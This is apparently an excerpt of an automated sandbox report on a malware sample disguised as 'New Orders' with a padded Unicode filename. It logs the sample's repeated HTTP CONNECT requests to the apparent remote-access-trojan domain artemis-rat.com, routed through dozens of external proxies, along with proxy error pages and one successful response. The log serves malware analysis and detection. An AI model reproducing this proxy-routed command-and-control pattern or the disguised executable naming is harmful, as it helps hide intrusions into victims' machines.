                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        913192.168.2.951806162.241.46.6534777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.271986008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.773286104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.477260113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.664314985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.164288998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.576435089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976607084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.773463011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.273341894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        914192.168.2.951663148.72.212.18327927672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.271992922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        915192.168.2.952826172.64.80.55807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.275652885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.439445972 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        916192.168.2.95271845.60.186.208274887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.281826019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        917192.168.2.9526895.75.192.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.283582926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        918192.168.2.952680178.128.113.118231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.293004036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.620793104 CET1286INHTTP/1.1 502 Bad Gateway
                                                                                        Server: squid
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3693
                                                                                        X-Squid-Error: ERR_CONNECT_FAIL 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        919192.168.2.950343209.142.64.219397897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.293055058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.476227999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.570700884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.570385933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.679507017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.773139000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.773185015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        920192.168.2.95173450.63.12.33238597672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.298821926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.438914061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539042950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.561222076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.648238897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.741930962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.835921049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.852178097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:43.961383104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        921192.168.2.952749146.19.106.194123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.299307108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.960705042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        922192.168.2.95274223.19.244.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.301533937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        923192.168.2.95176050.62.134.139626077672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.301875114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.438919067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        924192.168.2.95273672.10.160.171315717672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.303190947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        925192.168.2.951610170.239.205.39997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.306384087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.438992977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539057016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.561222076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.649442911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.741930962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.835921049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.852179050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:56.991079092 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        926192.168.2.9526365.44.42.115583867672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.355621099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        927192.168.2.952831207.244.229.3479767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.356189013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.945036888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        928192.168.2.95271370.166.167.55577457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.356684923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


